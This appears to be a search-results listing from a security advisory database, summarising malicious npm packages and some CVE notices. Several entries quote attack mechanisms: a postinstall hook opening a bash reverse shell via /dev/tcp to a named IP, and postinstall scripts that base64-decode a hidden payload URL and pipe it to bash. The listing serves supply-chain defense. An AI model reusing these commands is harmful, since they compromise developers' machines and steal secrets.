234544 matches found
Malicious Package
Overview buffer-export is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
MAL-2026-3658 Malicious code in load-bufferjs (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 04d9f5ba202651d252a375411cf609db6f9a7ae83f164f6f2e66559a6dff5b92 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in load-bufferjs (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 04d9f5ba202651d252a375411cf609db6f9a7ae83f164f6f2e66559a6dff5b92 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2026-3657 Malicious code in chai-as-streamed (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware fef1582aa7fb15599bd48e6f077be4d1a577d3916cf2c2650893f0406ede8ea3 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
GHSA-Q6X5-8V7M-XCRF vulnerabilities
Vulnerabilities for packages: gemini-cli, renovate, kubeflow-centraldashboard, pulumi, vitess, homepage, kibana, opentelemetry-auto-instrumentations-node, librechat, cadence-web...
CVE-2026-44291 vulnerabilities
Vulnerabilities for packages: gemini-cli, renovate, kubeflow-centraldashboard, pulumi, vitess, homepage, kibana, opentelemetry-auto-instrumentations-node, librechat, cadence-web...
MAL-2026-3714 Malicious code in hello-world-pkg-value-value-p (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...
Malicious code in hardhat-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bb86c79e7ed3cd429c0f28bc08e00ce020df2ec42fdda086ad8bfca99f259930 package.json declares a postinstall script that base64-decodes the string 'aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=' to the URL...
MAL-2026-3708 Malicious code in ethers-io (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14 The package's package.json declares a postinstall script that base64-decodes a hidden URL http://8.217.75.147:3000/payload and pipes the HTTP respons...
Malicious code in solc-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2016baa4fe29c296464b8381f88440457a113d79e2773d2252eb609a15ea2e03 package.json's postinstall lifecycle script runs node -e to base64-decode a hidden URL and pipe its contents to bash: curl -s...
Malicious code in web3-common (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 2e42f568897d9af194eb75275059455c99b369456b0c8e0ffe13e7f32be839e6 The OpenSSF Package Analysis project identified 'web3-common' @ 1.0.0 npm as malicious. It is considered malicious because: - The package execut...
MAL-2026-3653 Malicious code in @design-system-coopeuch/web (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a871445c3913d747a2f1383bcfdac02d6dec26ddb2053260340284cf4ee02233 Package @design-system-coopeuch/[email protected] is a dependency-confusion squat of an internal-looking scope, published at an inflated 999.x version to...
MAL-2026-3650 Malicious code in microsoft-applicationinsights-common (npm)
Two malicious npm packages published by the micresoft account typosquatting "microsoft" are part of a coordinated supply chain attack sharing identical infrastructure with packages published by the superbase account. Each package bundles a 4.5 MB statically-linked, UPX-packed ELF binary at...
MAL-2026-3617 Malicious code in katal-platform-versions (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 8dc8f21e750df73dfe46bbeba3bcfac8e88308adddf33680ce9751e7a1fec4af The OpenSSF Package Analysis project identified 'katal-platform-versions' @ 99.99.99 npm as malicious. It is considered malicious because: - The...
Malicious code in aoflmkt (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 7d5581b164c03c1b17ecfa5e7bab0422b7168cb3a8d44108ac108467e37adbc2 The OpenSSF Package Analysis project identified 'aoflmkt' @ 1.0.0 npm as malicious. It is considered malicious because: - The package communicat...
MAL-2026-3614 Malicious code in aoflmkt (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 7d5581b164c03c1b17ecfa5e7bab0422b7168cb3a8d44108ac108467e37adbc2 The OpenSSF Package Analysis project identified 'aoflmkt' @ 1.0.0 npm as malicious. It is considered malicious because: - The package communicat...
@0l00000l/auth (>=1.0.0 <=1.0.8), @0xchain/telemetry (>=1.1.0-beta.8 <=1.1.0-beta.18) +990 more potentially affected by CVE-2026-44292 via protobufjs (>=8.0.0 <=8.0.1)
protobufjs NPM version =8.0.0, =1.0.0, =1.1.0-beta.8, =0.8.0, =1.0.0, =1.1.4, =2.1.4, =0.3.1, =0.3.1, =0.7.1, =0.9.0 - @access-mcp/software-discovery =0.8.0 and more Source cves: CVE-2026-44292 Source advisory: OSV:GHSA-FX83-V9X8-X52W...
Malicious code in aoflcorp (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis bfc014b9e60bb1abb58d948abcf31112dd4c160ab8416317476f3c67c2e84d49 The OpenSSF Package Analysis project identified 'aoflcorp' @ 0.0.1 npm as malicious. It is considered malicious because: - The package...
MAL-2026-3613 Malicious code in aoflcorp (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis bfc014b9e60bb1abb58d948abcf31112dd4c160ab8416317476f3c67c2e84d49 The OpenSSF Package Analysis project identified 'aoflcorp' @ 0.0.1 npm as malicious. It is considered malicious because: - The package...
MAL-2026-3612 Malicious code in jwscube (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 325d4311f3dd1d82c8f9ee1ddc19a767eb69adf0a338625c8ce1e9d40062dec7 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...